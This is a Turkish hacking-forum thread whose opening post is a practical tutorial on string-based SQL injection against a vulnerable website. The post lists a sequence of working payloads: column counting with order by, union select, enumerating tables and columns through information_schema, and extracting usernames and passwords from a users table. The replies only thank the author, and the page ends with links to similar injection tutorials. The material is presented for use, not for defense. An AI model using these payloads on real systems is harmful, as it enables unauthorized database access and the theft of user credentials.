Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
String Based SQL İnjection
#1
merhaba arkadaşlar,

Bu makalemde sizlere string based sql injection’dan bahsedeceğim.Başlamadan önce kısa birşey açıklamak istiyorum.String SQL İnjection ile ilgili farklı yöntemler var.Başka bir yerde farklı şeyler görmüş olanlar olabilir.


Hemen geçelim:


örneğin bir sitemiz var sql açığı olan,

order by 1-- diyoruz site değişmiyor

order by 10000-- diyoruz site hala aynı...


Bu durumda sitede string based sql injection açığı olduğunu anlıyoruz.

Kullanımına geçelim:


id=10’ order by 1--+- şeklinde kolon sayılarını buluyoruz.Kolonlarımızın 6 olduğunu farz ediyorum.

id=10’ union select 1,2,3,4,5,6--+- şeklinde union select çektik.Karşımıza 3,4 sayılarının çıktığını farz ediyorum...

id=10’ union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--+- şeklinde tablolarımızı görüyoruz.Tablomuzun users olduğunu farzediyorum.


id=10’ union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x7573657273--+-

kolonlarımızı çekiyoruz.Yukarıdaki 0x ile başlayan yer users tablosunun hexlenmiş hali.

id=10’ union select 1,2,username,password,5,6 from users--+-


şeklindede username ve passwordu çektik.


Kısa ve öz bir anlatım yapmaya çalıştım.UMARIM YARARLI OLMUŞTUR.
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#2
ellerine sağlık exciting
www.deccal.org


Beğenenler:
#3
Dillerine sağlık exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#4
ellerine sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#5
eline sağlık
Beğenenler:
#6
Dillerinize sağlık exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Web Servislerinde İnjection Zaafiyetler CyberHacker 0 26 04-12-2016, Saat: 00:36
Son Yorum: CyberHacker
  Jsql injection H4KİK4T 17 1,691 29-10-2016, Saat: 15:23
Son Yorum: Trajedi
  Desıng SQL injection Vulnerability Dark-Capar 0 61 25-10-2016, Saat: 18:55
Son Yorum: Dark-Capar
  SQL İnjection Manual (Geniş Anlatım) You LosT 49 1,511 03-10-2016, Saat: 23:04
Son Yorum: Slowycan
  Manuel Sql İnjection Sesli Anlatım scorpiol 11 240 26-08-2016, Saat: 17:38
Son Yorum: scorpiol
Anahtar Kelimeler

String Based SQL İnjection indir, String Based SQL İnjection Videosu, String Based SQL İnjection Online izle, String Based SQL İnjection Bedava indir, String Based SQL İnjection Yükle, String Based SQL İnjection Hakkında, String Based SQL İnjection Nedir, String Based SQL İnjection Free indir, String Based SQL İnjection Oyunu, String Based SQL İnjection Download


1 Ziyaretçi